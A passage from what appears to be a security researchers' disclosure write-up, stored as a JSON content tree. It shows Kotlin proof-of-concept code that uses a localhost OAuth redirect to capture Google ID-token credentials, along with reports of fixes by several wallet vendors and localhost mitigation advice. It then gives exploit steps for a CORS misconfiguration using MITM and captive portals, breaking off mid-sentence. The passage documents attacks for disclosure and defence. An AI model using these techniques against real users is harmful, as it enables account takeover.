attributes[\"async\"] = \"\"\n attributes[\"defer\"] = \"\"\n }\n script {\n unsafe {\n +\"\"\"\n function handleCredentialResponse(response) {\n alert(\"credential: \" + response.credential);\n }\n\n window.onload = async function () {\n const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n const client_id = oauth_url.searchParams.get(\"client_id\");\n google.accounts.id.initialize({\n client_id: client_id,\n callback: handleCredentialResponse,\n auto_select: true\n });\n\n google.accounts.id.renderButton(\n document.getElementById(\"g_id_signin\"),\n { theme: \"outline\", size: \"large\" }\n );\n\n google.accounts.id.prompt();\n };\n \"\"\".trimIndent()\n }\n }\n }\n body {\n h1 { +\"Login here:\" }\n div {\n id = \"g_id_signin\"\n }\n }\n }\n }\n }\n }.start(wait = true)\n }\n",[107993],{"type":27,"tag":84,"props":107994,"children":107995},{"__ignoreMap":7},[107996,108023,108042,108049,108068,108079,108090,108121,108144,108191,108198,108205,108212,108252,108263,108270,108277,108296,108319,108330,108349,108364,108375,108395,108406,108423,108449,108473,108480,108491,108503,108516,108524,108532,108539,108546,108554,108562,108570,108578,108586,108594,108602,108609,108616,108624,108632,108640,108647,108654,108662,108669,108690,108698,108705,108712,108723,108747,108759,108776,108783,108790,108797,108804,108811,108838],{"type":27,"tag":207,"props":107997,"children":107998},{"class":209,"line":210},[107999,108003,108007,108011,108015,108019],{"type":27,"tag":207,"props":108000,"children":108001},{"style":214},[108002],{"type":33,"value":77677},{"type":27,"tag":207,"props":108004,"children":108005},{"style":214},[108006],{"type":33,"value":13489},{"type":27,"tag":207,"props":108008,"children":108009},{"style":1335},[108010],{"type":33,"value":77686},{"type":27,"tag":207,"props":108012,"children":108013},{"style":238},[108014],{"type":33,"value":77691},{"type":27,"tag":207,"props":108016,"children":108017},{"style":8920},[108018],{"type":33,"value":77696},{"type":27,"tag":207,"props":108020,"children":108021},{"style":238},[108022],{"type":33,"value":77701},{"type":27,"tag":207,"props":108024,"children":108025},{"class":209,"line":244},[108026,108030,108034,108038],{"type":27,"tag":207,"props":108027,"children":108028},{"style":214},[108029],{"type":33,"value":77709},{"type":27,"tag":207,"props":108031,"children":108032},{"style":238},[108033],{"type":33,"value":1041},{"type":27,"tag":207,"props":108035,"children":108036},{"style":1335},[108037],{"type":33,"value":77718},{"type":27,"tag":207,"props":108039,"children":108040},{"style":238},[108041],{"type":33,"value":77723},{"type":27,"tag":207,"props":108043,"children":108044},{"class":209,"line":270},[108045],{"type":27,"tag":207,"props":108046,"children":108047},{"emptyLinePlaceholder":19},[108048],{"type":33,"value":2062},{"type":27,"tag":207,"props":108050,"children":108051},{"class":209,"line":296},[108052,108056,108060,108064],{"type":27,"tag":207,"props":108053,"children":108054},{"style":1335},[108055],{"type":33,"value":77746},{"type":27,"tag":207,"props":108057,"children":108058},{"style":238},[108059],{"type":33,"value":77751},{"type":27,"tag":207,"props":108061,"children":108062},{"style":1335},[108063],{"type":33,"value":77756},{"type":27,"tag":207,"props":108065,"children":108066},{"style":238},[108067],{"type":33,"value":384},{"type":27,"tag":207,"props":108069,"children":108070},{"class":209,"line":445},[108071,108075],{"type":27,"tag":207,"props":108072,"children":108073},{"style":376},[108074],{"type":33,"value":77768},{"type":27,"tag":207,"props":108076,"children":108077},{"style":238},[108078],{"type":33,"value":384},{"type":27,"tag":207,"props":108080,"children":108081},{"class":209,"line":867},[108082,108086],{"type":27,"tag":207,"props":108083,"children":108084},{"style":1335},[108085],{"type":33,"value":77780},{"type":27,"tag":207,"props":108087,"children":108088},{"style":238},[108089],{"type":33,"value":15018},{"type":27,"tag":207,"props":108091,"children":108092},{"class":209,"line":892},[108093,108097,108101,108105,108109,108113,108117],{"type":27,"tag":207,"props":108094,"children":108095},{"style":238},[108096],{"type":33,"value":77792},{"type":27,"tag":207,"props":108098,"children":108099},{"style":1335},[108100],{"type":33,"value":77797},{"type":27,"tag":207,"props":108102,"children":108103},{"style":238},[108104],{"type":33,"value":1343},{"type":27,"tag":207,"props":108106,"children":108107},{"style":1325},[108108],{"type":33,"value":77806},{"type":27,"tag":207,"props":108110,"children":108111},{"style":238},[108112],{"type":33,"value":1123},{"type":27,"tag":207,"props":108114,"children":108115},{"style":1325},[108116],{"type":33,"value":77815},{"type":27,"tag":207,"props":108118,"children":108119},{"style":238},[108120],{"type":33,"value":10449},{"type":27,"tag":207,"props":108122,"children":108123},{"class":209,"line":1475},[108124,108128,108132,108136,108140],{"type":27,"tag":207,"props":108125,"children":108126},{"style":238},[108127],{"type":33,"value":77827},{"type":27,"tag":207,"props":108129,"children":108130},{"style":214},[108131],{"type":33,"value":413},{"type":27,"tag":207,"props":108133,"children":108134},{"style":238},[108135],{"type":33,"value":77836},{"type":27,"tag":207,"props":108137,"children":108138},{"style":8920},[108139],{"type":33,"value":77841},{"type":27,"tag":207,"props":108141,"children":108142},{"style":238},[108143],{"type":33,"value":1424},{"type":27,"tag":207,"props":108145,"children":108146},{"class":209,"line":2065},[108147,108151,108155,108159,108163,108167,108171,108175,108179,108183,108187],{"type":27,"tag":207,"props":108148,"children":108149},{"style":238},[108150],{"type":33,"value":77792},{"type":27,"tag":207,"props":108152,"children":108153},{"style":1335},[108154],{"type":33,"value":1419},{"type":27,"tag":207,"props":108156,"children":108157},{"style":238},[108158],{"type":33,"value":1343},{"type":27,"tag":207,"props":108160,"children":108161},{"style":1325},[108162],{"type":33,"value":77806},{"type":27,"tag":207,"props":108164,"children":108165},{"style":238},[108166],{"type":33,"value":1123},{"type":27,"tag":207,"props":108168,"children":108169},{"style":1325},[108170],{"type":33,"value":77873},{"type":27,"tag":207,"props":108172,"children":108173},{"style":214},[108174],{"type":33,"value":41364},{"type":27,"tag":207,"props":108176,"children":108177},{"style":226},[108178],{"type":33,"value":77882},{"type":27,"tag":207,"props":108180,"children":108181},{"style":214},[108182],{"type":33,"value":41396},{"type":27,"tag":207,"props":108184,"children":108185},{"style":1325},[108186],{"type":33,"value":27331},{"type":27,"tag":207,"props":108188,"children":108189},{"style":238},[108190],{"type":33,"value":77895},{"type":27,"tag":207,"props":108192,"children":108193},{"class":209,"line":2092},[108194],{"type":27,"tag":207,"props":108195,"children":108196},{"style":238},[108197],{"type":33,"value":66118},{"type":27,"tag":207,"props":108199,"children":108200},{"class":209,"line":2130},[108201],{"type":27,"tag":207,"props":108202,"children":108203},{"style":238},[108204],{"type":33,"value":10637},{"type":27,"tag":207,"props":108206,"children":108207},{"class":209,"line":2168},[108208],{"type":27,"tag":207,"props":108209,"children":108210},{"emptyLinePlaceholder":19},[108211],{"type":33,"value":2062},{"type":27,"tag":207,"props":108213,"children":108214},{"class":209,"line":4095},[108215,108219,108223,108227,108231,108235,108239,108243,108248],{"type":27,"tag":207,"props":108216,"children":108217},{"style":214},[108218],{"type":33,"value":77932},{"type":27,"tag":207,"props":108220,"children":108221},{"style":238},[108222],{"type":33,"value":77958},{"type":27,"tag":207,"props":108224,"children":108225},{"style":226},[108226],{"type":33,"value":10380},{"type":27,"tag":207,"props":108228,"children":108229},{"style":1335},[108230],{"type":33,"value":77967},{"type":27,"tag":207,"props":108232,"children":108233},{"style":238},[108234],{"type":33,"value":77972},{"type":27,"tag":207,"props":108236,"children":108237},{"style":1335},[108238],{"type":33,"value":46457},{"type":27,"tag":207,"props":108240,"children":108241},{"style":238},[108242],{"type":33,"value":1343},{"type":27,"tag":207,"props":108244,"children":108245},{"style":1325},[108246],{"type":33,"value":108247},"\"http://localhost:3000\"",{"type":27,"tag":207,"props":108249,"children":108250},{"style":238},[108251],{"type":33,"value":26983},{"type":27,"tag":207,"props":108253,"children":108254},{"class":209,"line":4103},[108255,108259],{"type":27,"tag":207,"props":108256,"children":108257},{"style":1335},[108258],{"type":33,"value":77989},{"type":27,"tag":207,"props":108260,"children":108261},{"style":238},[108262],{"type":33,"value":77994},{"type":27,"tag":207,"props":108264,"children":108265},{"class":209,"line":4154},[108266],{"type":27,"tag":207,"props":108267,"children":108268},{"style":238},[108269],{"type":33,"value":10645},{"type":27,"tag":207,"props":108271,"children":108272},{"class":209,"line":4203},[108273],{"type":27,"tag":207,"props":108274,"children":108275},{"emptyLinePlaceholder":19},[108276],{"type":33,"value":2062},{"type":27,"tag":207,"props":108278,"children":108279},{"class":209,"line":4249},[108280,108284,108288,108292],{"type":27,"tag":207,"props":108281,"children":108282},{"style":214},[108283],{"type":33,"value":78016},{"type":27,"tag":207,"props":108285,"children":108286},{"style":214},[108287],{"type":33,"value":13489},{"type":27,"tag":207,"props":108289,"children":108290},{"style":1335},[108291],{"type":33,"value":78025},{"type":27,"tag":207,"props":108293,"children":108294},{"style":238},[108295],{"type":33,"value":23011},{"type":27,"tag":207,"props":108297,"children":108298},{"class":209,"line":4290},[108299,108303,108307,108311,108315],{"type":27,"tag":207,"props":108300,"children":108301},{"style":1335},[108302],{"type":33,"value":78037},{"type":27,"tag":207,"props":108304,"children":108305},{"style":238},[108306],{"type":33,"value":78042},{"type":27,"tag":207,"props":108308,"children":108309},{"style":226},[108310],{"type":33,"value":10380},{"type":27,"tag":207,"props":108312,"children":108313},{"style":232},[108314],{"type":33,"value":78051},{"type":27,"tag":207,"props":108316,"children":108317},{"style":238},[108318],{"type":33,"value":1424},{"type":27,"tag":207,"props":108320,"children":108321},{"class":209,"line":4304},[108322,108326],{"type":27,"tag":207,"props":108323,"children":108324},{"style":1335},[108325],{"type":33,"value":78063},{"type":27,"tag":207,"props":108327,"children":108328},{"style":238},[108329],{"type":33,"value":384},{"type":27,"tag":207,"props":108331,"children":108332},{"class":209,"line":5466},[108333,108337,108341,108345],{"type":27,"tag":207,"props":108334,"children":108335},{"style":214},[108336],{"type":33,"value":78075},{"type":27,"tag":207,"props":108338,"children":108339},{"style":238},[108340],{"type":33,"value":1343},{"type":27,"tag":207,"props":108342,"children":108343},{"style":1325},[108344],{"type":33,"value":78084},{"type":27,"tag":207,"props":108346,"children":108347},{"style":238},[108348],{"type":33,"value":1424},{"type":27,"tag":207,"props":108350,"children":108351},{"class":209,"line":5530},[108352,108356,108360],{"type":27,"tag":207,"props":108353,"children":108354},{"style":238},[108355],{"type":33,"value":78096},{"type":27,"tag":207,"props":108357,"children":108358},{"style":1335},[108359],{"type":33,"value":78101},{"type":27,"tag":207,"props":108361,"children":108362},{"style":238},[108363],{"type":33,"value":384},{"type":27,"tag":207,"props":108365,"children":108366},{"class":209,"line":7900},[108367,108371],{"type":27,"tag":207,"props":108368,"children":108369},{"style":1335},[108370],{"type":33,"value":78113},{"type":27,"tag":207,"props":108372,"children":108373},{"style":238},[108374],{"type":33,"value":384},{"type":27,"tag":207,"props":108376,"children":108377},{"class":209,"line":7909},[108378,108382,108386,108391],{"type":27,"tag":207,"props":108379,"children":108380},{"style":1335},[108381],{"type":33,"value":78190},{"type":27,"tag":207,"props":108383,"children":108384},{"style":238},[108385],{"type":33,"value":1343},{"type":27,"tag":207,"props":108387,"children":108388},{"style":1325},[108389],{"type":33,"value":108390},"\"Test\"",{"type":27,"tag":207,"props":108392,"children":108393},{"style":238},[108394],{"type":33,"value":10449},{"type":27,"tag":207,"props":108396,"children":108397},{"class":209,"line":7917},[108398,108402],{"type":27,"tag":207,"props":108399,"children":108400},{"style":1335},[108401],{"type":33,"value":78256},{"type":27,"tag":207,"props":108403,"children":108404},{"style":238},[108405],{"type":33,"value":384},{"type":27,"tag":207,"props":108407,"children":108408},{"class":209,"line":7926},[108409,108414,108418],{"type":27,"tag":207,"props":108410,"children":108411},{"style":238},[108412],{"type":33,"value":108413}," src ",{"type":27,"tag":207,"props":108415,"children":108416},{"style":226},[108417],{"type":33,"value":10380},{"type":27,"tag":207,"props":108419,"children":108420},{"style":1325},[108421],{"type":33,"value":108422}," \"https://accounts.google.com/gsi/client\"\n",{"type":27,"tag":207,"props":108424,"children":108425},{"class":209,"line":7934},[108426,108431,108436,108440,108444],{"type":27,"tag":207,"props":108427,"children":108428},{"style":238},[108429],{"type":33,"value":108430}," attributes[",{"type":27,"tag":207,"props":108432,"children":108433},{"style":1325},[108434],{"type":33,"value":108435},"\"async\"",{"type":27,"tag":207,"props":108437,"children":108438},{"style":238},[108439],{"type":33,"value":15942},{"type":27,"tag":207,"props":108441,"children":108442},{"style":226},[108443],{"type":33,"value":10380},{"type":27,"tag":207,"props":108445,"children":108446},{"style":1325},[108447],{"type":33,"value":108448}," \"\"\n",{"type":27,"tag":207,"props":108450,"children":108451},{"class":209,"line":7943},[108452,108456,108461,108465,108469],{"type":27,"tag":207,"props":108453,"children":108454},{"style":238},[108455],{"type":33,"value":108430},{"type":27,"tag":207,"props":108457,"children":108458},{"style":1325},[108459],{"type":33,"value":108460},"\"defer\"",{"type":27,"tag":207,"props":108462,"children":108463},{"style":238},[108464],{"type":33,"value":15942},{"type":27,"tag":207,"props":108466,"children":108467},{"style":226},[108468],{"type":33,"value":10380},{"type":27,"tag":207,"props":108470,"children":108471},{"style":1325},[108472],{"type":33,"value":108448},{"type":27,"tag":207,"props":108474,"children":108475},{"class":209,"line":7952},[108476],{"type":27,"tag":207,"props":108477,"children":108478},{"style":238},[108479],{"type":33,"value":78281},{"type":27,"tag":207,"props":108481,"children":108482},{"class":209,"line":7961},[108483,108487],{"type":27,"tag":207,"props":108484,"children":108485},{"style":1335},[108486],{"type":33,"value":78256},{"type":27,"tag":207,"props":108488,"children":108489},{"style":238},[108490],{"type":33,"value":384},{"type":27,"tag":207,"props":108492,"children":108493},{"class":209,"line":7969},[108494,108499],{"type":27,"tag":207,"props":108495,"children":108496},{"style":1335},[108497],{"type":33,"value":108498}," unsafe",{"type":27,"tag":207,"props":108500,"children":108501},{"style":238},[108502],{"type":33,"value":384},{"type":27,"tag":207,"props":108504,"children":108505},{"class":209,"line":7978},[108506,108511],{"type":27,"tag":207,"props":108507,"children":108508},{"style":226},[108509],{"type":33,"value":108510}," +",{"type":27,"tag":207,"props":108512,"children":108513},{"style":1325},[108514],{"type":33,"value":108515},"\"\"\"\n",{"type":27,"tag":207,"props":108517,"children":108518},{"class":209,"line":7987},[108519],{"type":27,"tag":207,"props":108520,"children":108521},{"style":1325},[108522],{"type":33,"value":108523}," function handleCredentialResponse(response) {\n",{"type":27,"tag":207,"props":108525,"children":108526},{"class":209,"line":7996},[108527],{"type":27,"tag":207,"props":108528,"children":108529},{"style":1325},[108530],{"type":33,"value":108531}," alert(\"credential: \" + response.credential);\n",{"type":27,"tag":207,"props":108533,"children":108534},{"class":209,"line":8005},[108535],{"type":27,"tag":207,"props":108536,"children":108537},{"style":1325},[108538],{"type":33,"value":10645},{"type":27,"tag":207,"props":108540,"children":108541},{"class":209,"line":8013},[108542],{"type":27,"tag":207,"props":108543,"children":108544},{"emptyLinePlaceholder":19},[108545],{"type":33,"value":2062},{"type":27,"tag":207,"props":108547,"children":108548},{"class":209,"line":8021},[108549],{"type":27,"tag":207,"props":108550,"children":108551},{"style":1325},[108552],{"type":33,"value":108553}," window.onload = async function () {\n",{"type":27,"tag":207,"props":108555,"children":108556},{"class":209,"line":8029},[108557],{"type":27,"tag":207,"props":108558,"children":108559},{"style":1325},[108560],{"type":33,"value":108561}," const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n",{"type":27,"tag":207,"props":108563,"children":108564},{"class":209,"line":8037},[108565],{"type":27,"tag":207,"props":108566,"children":108567},{"style":1325},[108568],{"type":33,"value":108569}," const client_id = oauth_url.searchParams.get(\"client_id\");\n",{"type":27,"tag":207,"props":108571,"children":108572},{"class":209,"line":8046},[108573],{"type":27,"tag":207,"props":108574,"children":108575},{"style":1325},[108576],{"type":33,"value":108577}," google.accounts.id.initialize({\n",{"type":27,"tag":207,"props":108579,"children":108580},{"class":209,"line":8055},[108581],{"type":27,"tag":207,"props":108582,"children":108583},{"style":1325},[108584],{"type":33,"value":108585}," client_id: client_id,\n",{"type":27,"tag":207,"props":108587,"children":108588},{"class":209,"line":8064},[108589],{"type":27,"tag":207,"props":108590,"children":108591},{"style":1325},[108592],{"type":33,"value":108593}," callback: handleCredentialResponse,\n",{"type":27,"tag":207,"props":108595,"children":108596},{"class":209,"line":8072},[108597],{"type":27,"tag":207,"props":108598,"children":108599},{"style":1325},[108600],{"type":33,"value":108601}," auto_select: true\n",{"type":27,"tag":207,"props":108603,"children":108604},{"class":209,"line":8081},[108605],{"type":27,"tag":207,"props":108606,"children":108607},{"style":1325},[108608],{"type":33,"value":14578},{"type":27,"tag":207,"props":108610,"children":108611},{"class":209,"line":8090},[108612],{"type":27,"tag":207,"props":108613,"children":108614},{"emptyLinePlaceholder":19},[108615],{"type":33,"value":2062},{"type":27,"tag":207,"props":108617,"children":108618},{"class":209,"line":8098},[108619],{"type":27,"tag":207,"props":108620,"children":108621},{"style":1325},[108622],{"type":33,"value":108623}," google.accounts.id.renderButton(\n",{"type":27,"tag":207,"props":108625,"children":108626},{"class":209,"line":8107},[108627],{"type":27,"tag":207,"props":108628,"children":108629},{"style":1325},[108630],{"type":33,"value":108631}," document.getElementById(\"g_id_signin\"),\n",{"type":27,"tag":207,"props":108633,"children":108634},{"class":209,"line":8116},[108635],{"type":27,"tag":207,"props":108636,"children":108637},{"style":1325},[108638],{"type":33,"value":108639}," { theme: \"outline\", size: \"large\" }\n",{"type":27,"tag":207,"props":108641,"children":108642},{"class":209,"line":8125},[108643],{"type":27,"tag":207,"props":108644,"children":108645},{"style":1325},[108646],{"type":33,"value":14048},{"type":27,"tag":207,"props":108648,"children":108649},{"class":209,"line":8133},[108650],{"type":27,"tag":207,"props":108651,"children":108652},{"emptyLinePlaceholder":19},[108653],{"type":33,"value":2062},{"type":27,"tag":207,"props":108655,"children":108656},{"class":209,"line":8142},[108657],{"type":27,"tag":207,"props":108658,"children":108659},{"style":1325},[108660],{"type":33,"value":108661}," google.accounts.id.prompt();\n",{"type":27,"tag":207,"props":108663,"children":108664},{"class":209,"line":8151},[108665],{"type":27,"tag":207,"props":108666,"children":108667},{"style":1325},[108668],{"type":33,"value":46243},{"type":27,"tag":207,"props":108670,"children":108671},{"class":209,"line":8160},[108672,108677,108681,108686],{"type":27,"tag":207,"props":108673,"children":108674},{"style":1325},[108675],{"type":33,"value":108676}," \"\"\"",{"type":27,"tag":207,"props":108678,"children":108679},{"style":238},[108680],{"type":33,"value":1041},{"type":27,"tag":207,"props":108682,"children":108683},{"style":1335},[108684],{"type":33,"value":108685},"trimIndent",{"type":27,"tag":207,"props":108687,"children":108688},{"style":238},[108689],{"type":33,"value":15018},{"type":27,"tag":207,"props":108691,"children":108692},{"class":209,"line":8169},[108693],{"type":27,"tag":207,"props":108694,"children":108695},{"style":238},[108696],{"type":33,"value":108697}," }\n",{"type":27,"tag":207,"props":108699,"children":108700},{"class":209,"line":8177},[108701],{"type":27,"tag":207,"props":108702,"children":108703},{"style":238},[108704],{"type":33,"value":78281},{"type":27,"tag":207,"props":108706,"children":108707},{"class":209,"line":8185},[108708],{"type":27,"tag":207,"props":108709,"children":108710},{"style":238},[108711],{"type":33,"value":78211},{"type":27,"tag":207,"props":108713,"children":108714},{"class":209,"line":8194},[108715,108719],{"type":27,"tag":207,"props":108716,"children":108717},{"style":1335},[108718],{"type":33,"value":78219},{"type":27,"tag":207,"props":108720,"children":108721},{"style":238},[108722],{"type":33,"value":384},{"type":27,"tag":207,"props":108724,"children":108725},{"class":209,"line":9933},[108726,108730,108734,108738,108743],{"type":27,"tag":207,"props":108727,"children":108728},{"style":1335},[108729],{"type":33,"value":78231},{"type":27,"tag":207,"props":108731,"children":108732},{"style":238},[108733],{"type":33,"value":16862},{"type":27,"tag":207,"props":108735,"children":108736},{"style":226},[108737],{"type":33,"value":2227},{"type":27,"tag":207,"props":108739,"children":108740},{"style":1325},[108741],{"type":33,"value":108742},"\"Login here:\"",{"type":27,"tag":207,"props":108744,"children":108745},{"style":238},[108746],{"type":33,"value":16872},{"type":27,"tag":207,"props":108748,"children":108749},{"class":209,"line":9941},[108750,108755],{"type":27,"tag":207,"props":108751,"children":108752},{"style":1335},[108753],{"type":33,"value":108754}," div",{"type":27,"tag":207,"props":108756,"children":108757},{"style":238},[108758],{"type":33,"value":384},{"type":27,"tag":207,"props":108760,"children":108761},{"class":209,"line":9950},[108762,108767,108771],{"type":27,"tag":207,"props":108763,"children":108764},{"style":238},[108765],{"type":33,"value":108766}," id ",{"type":27,"tag":207,"props":108768,"children":108769},{"style":226},[108770],{"type":33,"value":10380},{"type":27,"tag":207,"props":108772,"children":108773},{"style":1325},[108774],{"type":33,"value":108775}," \"g_id_signin\"\n",{"type":27,"tag":207,"props":108777,"children":108778},{"class":209,"line":9959},[108779],{"type":27,"tag":207,"props":108780,"children":108781},{"style":238},[108782],{"type":33,"value":78281},{"type":27,"tag":207,"props":108784,"children":108785},{"class":209,"line":9968},[108786],{"type":27,"tag":207,"props":108787,"children":108788},{"style":238},[108789],{"type":33,"value":78211},{"type":27,"tag":207,"props":108791,"children":108792},{"class":209,"line":9977},[108793],{"type":27,"tag":207,"props":108794,"children":108795},{"style":238},[108796],{"type":33,"value":78296},{"type":27,"tag":207,"props":108798,"children":108799},{"class":209,"line":9985},[108800],{"type":27,"tag":207,"props":108801,"children":108802},{"style":238},[108803],{"type":33,"value":78304},{"type":27,"tag":207,"props":108805,"children":108806},{"class":209,"line":9994},[108807],{"type":27,"tag":207,"props":108808,"children":108809},{"style":238},[108810],{"type":33,"value":66118},{"type":27,"tag":207,"props":108812,"children":108813},{"class":209,"line":10002},[108814,108818,108822,108826,108830,108834],{"type":27,"tag":207,"props":108815,"children":108816},{"style":238},[108817],{"type":33,"value":78319},{"type":27,"tag":207,"props":108819,"children":108820},{"style":1335},[108821],{"type":33,"value":946},{"type":27,"tag":207,"props":108823,"children":108824},{"style":238},[108825],{"type":33,"value":78328},{"type":27,"tag":207,"props":108827,"children":108828},{"style":226},[108829],{"type":33,"value":10380},{"type":27,"tag":207,"props":108831,"children":108832},{"style":214},[108833],{"type":33,"value":19746},{"type":27,"tag":207,"props":108835,"children":108836},{"style":238},[108837],{"type":33,"value":10449},{"type":27,"tag":207,"props":108839,"children":108840},{"class":209,"line":10010},[108841],{"type":27,"tag":207,"props":108842,"children":108843},{"style":238},[108844],{"type":33,"value":10645},{"type":27,"tag":36,"props":108846,"children":108847},{},[108848],{"type":33,"value":108849},"We also reported this vulnerability to the Web3Auth mobile SDK, Slush Wallet, Kukai Wallet, and several other web3 platforms. As mentioned earlier, this issue could have allowed account takeover with zero user interaction if the user had installed an application that exploited the localhost redirect.",{"type":27,"tag":36,"props":108851,"children":108852},{},[108853],{"type":33,"value":108854},"Each team responded promptly, communicated clearly, and shipped fixes quickly. Their diligence set a strong example for coordinated response and helped ensure user security across the ecosystem.",{"type":27,"tag":58,"props":108856,"children":108858},{"id":108857},"how-to-mitigate",[108859],{"type":33,"value":108860},"How to Mitigate",{"type":27,"tag":36,"props":108862,"children":108863},{},[108864],{"type":33,"value":108865},"The proper way to mitigate this issue is to disallow localhost in the live environment. Developers should have a separate staging OAuth environment with a different client ID for testing purposes. It's important to ensure that tokens generated using the test client ID are not valid in the live environment.",{"type":27,"tag":28,"props":108867,"children":108869},{"id":108868},"exploiting-cors",[108870],{"type":33,"value":108871},"Exploiting CORS",{"type":27,"tag":36,"props":108873,"children":108874},{},[108875],{"type":33,"value":108876},"Another bug we found during our research was related to CORS misconfiguration and how different browsers handle mixed content requests.",{"type":27,"tag":36,"props":108878,"children":108879},{},[108880,108882,108888],{"type":33,"value":108881},"While checking for other bugs in exchanges, we found a CORS (Cross-Origin Resource Sharing) configuration allowing credentials and ",{"type":27,"tag":84,"props":108883,"children":108885},{"className":108884},[],[108886],{"type":33,"value":108887},"http://",{"type":33,"value":108889}," schema for any subdomain:",{"type":27,"tag":101,"props":108891,"children":108895},{"className":108892,"code":108893,"language":108894,"meta":7,"style":7},"language-http shiki shiki-themes slack-dark","HTTP 200 OK\nAccess-Control-Allow-Origin: http://aa.exchange.com\nAccess-Control-Allow-Credentials: true\n[...]\n","http",[108896],{"type":27,"tag":84,"props":108897,"children":108898},{"__ignoreMap":7},[108899,108907,108915,108923],{"type":27,"tag":207,"props":108900,"children":108901},{"class":209,"line":210},[108902],{"type":27,"tag":207,"props":108903,"children":108904},{},[108905],{"type":33,"value":108906},"HTTP 200 OK\n",{"type":27,"tag":207,"props":108908,"children":108909},{"class":209,"line":244},[108910],{"type":27,"tag":207,"props":108911,"children":108912},{},[108913],{"type":33,"value":108914},"Access-Control-Allow-Origin: http://aa.exchange.com\n",{"type":27,"tag":207,"props":108916,"children":108917},{"class":209,"line":270},[108918],{"type":27,"tag":207,"props":108919,"children":108920},{},[108921],{"type":33,"value":108922},"Access-Control-Allow-Credentials: true\n",{"type":27,"tag":207,"props":108924,"children":108925},{"class":209,"line":296},[108926],{"type":27,"tag":207,"props":108927,"children":108928},{},[108929],{"type":33,"value":17595},{"type":27,"tag":58,"props":108931,"children":108933},{"id":108932},"cors-misconfiguration-by-lack-of-tls",[108934],{"type":33,"value":108935},"CORS Misconfiguration by Lack of TLS",{"type":27,"tag":36,"props":108937,"children":108938},{},[108939,108941,108947],{"type":33,"value":108940},"This case requires specific preconditions. The idea is to redirect the user to an insecure subdomain of ",{"type":27,"tag":84,"props":108942,"children":108944},{"className":108943},[],[108945],{"type":33,"value":108946},"exchange.com",{"type":33,"value":108948}," and spoof the response by intercepting and tampering with the victim's network packets.",{"type":27,"tag":36,"props":108950,"children":108951},{},[108952],{"type":33,"value":108953},"However, while testing it by simulating an MITM attack, we figured out that this type of attack behaves differently amongst the main browsers:",{"type":27,"tag":1228,"props":108955,"children":108956},{},[108957,108977],{"type":27,"tag":1232,"props":108958,"children":108959},{},[108960,108962,108967,108969,108975],{"type":33,"value":108961},"Chrome --> won't work because cookies are not sent in ",{"type":27,"tag":84,"props":108963,"children":108965},{"className":108964},[],[108966],{"type":33,"value":108887},{"type":33,"value":108968}," --> ",{"type":27,"tag":84,"props":108970,"children":108972},{"className":108971},[],[108973],{"type":33,"value":108974},"https://",{"type":33,"value":108976}," requests, even if same-site",{"type":27,"tag":1232,"props":108978,"children":108979},{},[108980,108982],{"type":33,"value":108981},"Firefox and Safari --> works since cookies are sent from an insecure context ",{"type":27,"tag":84,"props":108983,"children":108985},{"className":108984},[],[108986],{"type":33,"value":45013},{"type":27,"tag":58,"props":108988,"children":108990},{"id":108989},"exploit-1",[108991],{"type":33,"value":107326},{"type":27,"tag":36,"props":108993,"children":108994},{},[108995],{"type":33,"value":108996},"To exploit it, we must follow some steps:",{"type":27,"tag":12719,"props":108998,"children":108999},{},[109000,109005,109010],{"type":27,"tag":1232,"props":109001,"children":109002},{},[109003],{"type":33,"value":109004},"Force the victim to enter an insecure webpage in the exchange subdomain",{"type":27,"tag":1232,"props":109006,"children":109007},{},[109008],{"type":33,"value":109009},"Deliver the malicious script to the victim using MITM (Man-In-The-Middle)",{"type":27,"tag":1232,"props":109011,"children":109012},{},[109013,109015,109020],{"type":33,"value":109014},"Use ",{"type":27,"tag":84,"props":109016,"children":109018},{"className":109017},[],[109019],{"type":33,"value":45013},{"type":33,"value":109021}," with CORS to do something malicious using the victim's account",{"type":27,"tag":36,"props":109023,"children":109024},{},[109025],{"type":33,"value":109026},"To exploit the CORS issue, an attacker must first get the victim to load an insecure subdomain. This can be achieved through techniques such as spoofing Wi-Fi or creating a fake public network that automatically opens the insecure page as the captive portal.",{"type":27,"tag":36,"props":109028,"children":109029},{},[109030,109032,109037],{"type":33,"value":109031},"Once the redirect to the ",{"type":27,"tag":84,"props":109033,"children":109035},{"className":109034},[],[109036],{"type":33,"value":108887},{"type":33,"value":109038}," website is made, if the attacker is in an adjacent network, it is possible to intercept the HTTP request/response (or DNS resolve) and tamper with the returning page. The returning page should have a malicious script that exploits the CORS 